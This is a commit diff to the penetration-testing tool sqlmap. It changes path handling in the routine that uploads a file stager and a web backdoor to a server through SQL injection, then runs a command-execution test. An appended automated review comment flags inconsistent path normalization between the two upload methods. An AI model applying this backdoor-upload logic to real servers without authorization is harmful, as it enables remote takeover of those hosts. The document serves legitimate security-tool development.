Miroslav Stampar 2015-05-19 18:40:45 +02:00
parent 17bfda1b9c
commit 699c965bc0


@ -5,10 +5,11 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import urlparse
import os import os
import posixpath
import re import re
import StringIO import StringIO
import urlparse
from tempfile import mkstemp from tempfile import mkstemp
@ -130,7 +131,7 @@ class Web:
return False return False
def _webFileInject(self, fileContent, fileName, directory): def _webFileInject(self, fileContent, fileName, directory):
outFile = ntToPosixSlashes(os.path.join(directory, fileName)) outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = "" query = ""
@ -203,19 +204,16 @@ class Web:
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
success = False success = False
for directory in directories: for directory in directories:
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
if success:
break
if not directory: if not directory:
continue continue
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
uploaded = False uploaded = False
directory = ntToPosixSlashes(normalizePath(directory)) directory = ntToPosixSlashes(normalizePath(directory))
@ -224,6 +222,9 @@ class Web:
else: else:
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
if not directory.endswith('/'):
directory += '/'
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT 'LINES TERMINATED BY' method" infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
@ -254,6 +255,9 @@ class Web:
infoMsg += "via UNION method" infoMsg += "via UNION method"
logger.info(infoMsg) logger.info(infoMsg)
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
handle, filename = mkstemp() handle, filename = mkstemp()
os.fdopen(handle).close() # close low level handle (causing problems later) os.fdopen(handle).close() # close low level handle (causing problems later)
@ -278,18 +282,7 @@ class Web:
uploaded = True uploaded = True
break break
# Extra check - required
if not uploaded: if not uploaded:
self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" not in uplPage:
continue continue
if "<%" in uplPage or "<?" in uplPage: if "<%" in uplPage or "<?" in uplPage:
@ -343,10 +336,10 @@ class Web:
else: else:
continue continue
self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName)) self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
self.webDirectory = directory self.webDirectory = directory
self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName)) self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
testStr = "command execution test" testStr = "command execution test"
output = self.webBackdoorRunCmd("echo %s" % testStr) output = self.webBackdoorRunCmd("echo %s" % testStr)
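Review bot: In the hunk at `@ -203,19 +204,16 @@`, the added `self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)` runs before `directory` is passed through `normalizePath`, optionally stripped of its drive letter, and given a trailing slash. The identical pair of lines added in the UNION branch (`@ -254,6 +255,9 @@`) uses the already-normalized value. The same directory can therefore be recorded as two different paths depending on which upload method ran. If later cleanup relies on this attribute (not visible here), the stager file could be left behind on the tested host. Moving the first pair of lines to just after the `if not directory.endswith('/'): directory += '/'` block would make both branches record the path in the same form. The enclosing method starts and ends outside these hunks.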